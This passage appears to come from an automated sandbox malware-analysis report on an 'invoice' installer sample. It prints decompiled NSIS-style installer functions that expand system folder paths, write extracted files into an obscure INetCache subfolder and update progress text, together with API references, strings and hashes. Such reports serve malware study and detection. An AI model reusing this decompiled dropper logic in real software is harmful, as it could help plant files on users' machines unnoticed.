				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f458;
				_t39 = 0x42e3a0;
				_t90 = 0x42e3a0;
				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405F87(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3a0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E00405F65(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00405EC3(_t90,  *0x42f408);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004061CF(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f40c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f404;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E4C((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040); // executed
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405F87(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405F65(_a4, _t39);
			}

0x00405f87
0x00405f87
0x00405f87
0x00405f8d
0x00405f92
0x00405f94
0x00405fa3
0x00405fa3
0x00405fab
0x00405fac
0x00405fad
0x00405fae
0x00405fb1
0x00405fb9
0x00405fbb
0x00405fd2
0x00405fd5
0x00405fd5
0x004061ac
0x004061ac
0x004061b0
0x00000000
0x00000000
0x00405fe2
0x00405fe8
0x00000000
0x00000000
0x00405fee
0x00405fef
0x00405ff2
0x00405ff5
0x0040619f
0x004061a9
0x004061ab
0x004061ab
0x004061a1
0x004061a3
0x004061a5
0x004061a6
0x004061a6
0x00000000
0x0040619f
0x00405ffb
0x00405fff
0x0040600f
0x00406016
0x00406019
0x00406021
0x00406024
0x0040602b
0x0040602c
0x0040602f
0x0040614c
0x0040614f
0x0040617f
0x00406182
0x00406187
0x0040618b
0x0040618b
0x00406190
0x00406196
0x00406198
0x00000000
0x00406198
0x00406151
0x00406154
0x00406169
0x00406170
0x00406156
0x0040615d
0x0040615d
0x00406178
0x0040617b
0x00406144
0x00406145
0x00406145
0x00000000
0x0040617b
0x00406035
0x0040603c
0x0040603e
0x0040603f
0x00406059
0x00406059
0x00406060
0x00406060
0x00406067
0x0040606b
0x0040606b
0x0040606c
0x0040606e
0x004060a7
0x004060aa
0x004060ba
0x004060bd
0x004060c5
0x004060cb
0x004060cb
0x0040612a
0x0040612a
0x0040612c
0x00000000
0x00000000
0x004060cf
0x004060d6
0x004060d7
0x004060d9
0x004060f3
0x00406101
0x00406107
0x00406109
0x00406127
0x00406127
0x00406127
0x00000000
0x00406127
0x0040610f
0x00406118
0x0040611b
0x00406121
0x00406125
0x00000000
0x00000000
0x00000000
0x00406125
0x004060db
0x004060de
0x00000000
0x00000000
0x004060ed
0x004060ef
0x004060f1
0x00000000
0x00000000
0x00000000
0x004060f1
0x00000000
0x0040612a
0x004060b2
0x00000000
0x00406070
0x0040608b
0x00406090
0x00406093
0x00406133
0x00406133
0x00406137
0x0040613f
0x0040613f
0x00000000
0x00406137
0x0040609d
0x0040612e
0x0040612e
0x00406131
0x00000000
0x00000000
0x00000000
0x00406131
0x0040606e
0x00406041
0x00406045
0x00000000
0x00000000
0x00406047
0x0040604b
0x00000000
0x00000000
0x0040604d
0x00406051
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00406051
0x004061b6
0x004061c0
0x004061cc
0x004061cc
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B2
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000), ref: 004060C5
SHGetSpecialFolderLocation.SHELL32(004050C4,767923A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000), ref: 00406101
SHGetPathFromIDListA.SHELL32(767923A0,Call), ref: 0040610F
CoTaskMemFree.OLE32(767923A0), ref: 0040611B
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,00000000,0041C028,767923A0), ref: 00406191

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll, xrefs: 00405FAC
Call, xrefs: 00405FB1, 0040607E, 0040607F, 00406080, 0040609C, 004060B1, 004060C4, 004060E0, 0040610B, 0040613E, 00406144, 0040615C, 0040616F, 0040618A, 00406190, 00406198, 004061C2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
g, xrefs: 00405F94

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$g
API String ID: 717251189-2197224430
Opcode ID: 5106712905544f5ba106292216a6fc296fbdb3386ca655048f42707a8493570e
Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
Opcode Fuzzy Hash: 5106712905544f5ba106292216a6fc296fbdb3386ca655048f42707a8493570e
Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402AC1(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040596A(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004058FD(E00405F65(0x40a418, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship")), ??);
				} else {
					_push(0x40a418);
					E00405F65();
				}
				E004061CF(0x40a418);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406268(0x40a418);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405AD9(0x40a418);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405AFE(0x40a418, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040508C(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E00405F65(0x40ac18, 0x430000);
						E00405F65(0x430000, 0x40a418);
						E00405F87(_t75, 0x40ac18, 0x40a418, "C:\Users\Arthur\AppData\Local\Temp\nstA9F8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405F65(0x430000, 0x40ac18);
						_t62 = E00405681("C:\Users\Arthur\AppData\Local\Temp\nstA9F8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a418);
								_push(0xfffffffa);
								E0040508C();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040508C(0xffffffea,  *(_t85 - 8));
				 *0x42f4d4 =  *0x42f4d4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402F81(); // executed
				 *0x42f4d4 =  *0x42f4d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405F87(_t75, _t80, 0x40a418, 0x40a418, 0xffffffee);
					} else {
						E00405F87(_t75, _t80, 0x40a418, 0x40a418, 0xffffffe9);
						lstrcatA(0x40a418,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a418);
					E00405681();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x00402716
0x00402716
0x00402951
0x00402954
0x00402954
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x0040295a
0x0040295a
0x0040295a
0x00401858
0x00401858
0x00401859
0x00401492
0x004022e1
0x004022e1
0x004022e1
0x00401856
0x0040184f
0x0040295c
0x00402960
0x00402960
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x004022dc
0x00000000
0x004022dc
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72

Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148

Strings

C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 00401786
Call, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nstA9F8.tmp, xrefs: 004017A3, 00401812, 00401830

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship$C:\Users\user\AppData\Local\Temp\nstA9F8.tmp$C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll$Call
API String ID: 1941528284-1600441529
Opcode ID: 98a1d938c2887b8159c1b5f9a529be0333a72b233cb983e9a9a22398b60c3e71
Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
Opcode Fuzzy Hash: 98a1d938c2887b8159c1b5f9a529be0333a72b233cb983e9a9a22398b60c3e71
Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F81 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402F81(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x419428;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004031A9( *0x42f478 + _t62);
				}
				if(E00403193( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403193(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403193(0x415428, _t98) == 0) {
								goto L41;
							}
							if(E00405BA5(_a8, 0x415428, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bd8c =  *0x40bd8c & 0x00000000;
					 *0x40bd88 =  *0x40bd88 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b870 = 8;
					 *0x415418 = 0x40d410;
					 *0x415414 = 0x40d410;
					 *0x415410 = 0x415410;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403193(0x415428, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b860 = 0x415428;
						 *0x40b864 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b868 = _t95;
							 *0x40b86c = _v12;
							_t75 = E00406422("?mA");
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b868; // 0x41c028
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040508C(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b868; // 0x41c028
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405BA5(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00402f89
0x00402f8d
0x00402f90
0x00402f95
0x00402f97
0x00402f97
0x00402f9e
0x00402fa2
0x00402fa7
0x00402fa9
0x00402fa9
0x00402fb0
0x00402fb5
0x00402fc0
0x00402fc0
0x00402fd2
0x00403181
0x00403181
0x00000000
0x00402fd8
0x00402fdc
0x0040312e
0x00403171
0x00403173
0x00403173
0x0040317f
0x00403186
0x00403189
0x00000000
0x00000000
0x00000000
0x00000000
0x0040317f
0x00403133
0x00000000
0x00000000
0x00403135
0x00403138
0x0040313b
0x0040313e
0x00403140
0x00403140
0x00403150
0x00000000
0x00000000
0x0040315e
0x00403128
0x00403128
0x00403183
0x00403183
0x00000000
0x00403183
0x00403160
0x00403163
0x0040316a
0x00000000
0x00000000
0x00000000
0x0040316c
0x00000000
0x00403138
0x00402fe8
0x00402fea
0x00402ff1
0x00402ff8
0x00402ff8
0x00402fff
0x00403007
0x00403011
0x00403016
0x0040301e
0x00403028
0x0040302b
0x00000000
0x00000000
0x00000000
0x00000000
0x00403031
0x00403031
0x00403031
0x00403039
0x0040303b
0x0040303b
0x0040304c
0x00000000
0x00000000
0x00403052
0x00403055
0x0040305b
0x00403061
0x00403061
0x0040306c
0x00403072
0x00403077
0x0040307e
0x00403081
0x00000000
0x00000000
0x00403087
0x0040308d
0x0040308f
0x00403098
0x0040309a
0x004030c8
0x004030ce
0x004030d7
0x004030dc
0x004030dc
0x004030e1
0x0040311c
0x00000000
0x00000000
0x00000000
0x004030e3
0x004030e7
0x004030fe
0x00403103
0x00403106
0x00403109
0x0040310c
0x00403110
0x00000000
0x00000000
0x00000000
0x00403116
0x004030f0
0x004030f7
0x00000000
0x00000000
0x004030f9
0x00000000
0x004030f9
0x004030e1
0x00403124
0x00000000
0x00403124
0x00000000
0x00403031

APIs

GetTickCount.KERNEL32 ref: 00402FE8
GetTickCount.KERNEL32 ref: 0040308F
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030B8
wsprintfA.USER32 ref: 004030C8

Strings

(TA, xrefs: 0040303E
?mA, xrefs: 00403055, 00403067
... %d%%, xrefs: 004030C2
(TA, xrefs: 00403142

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%$?mA
API String ID: 551687249-1330877741
Opcode ID: 3a673b9f7453c760f6c1792c8fc342caba0986dfdf2a426a9d97dd1df172e485
Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
Opcode Fuzzy Hash: 3a673b9f7453c760f6c1792c8fc342caba0986dfdf2a426a9d97dd1df172e485
Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040508C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040508C(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ebe4; // 0x103c2
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405F87(0, _t39, 0x42a050, 0x42a050, _a4);
					}
					_t26 = lstrlenA(0x42a050);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a050;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a050)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
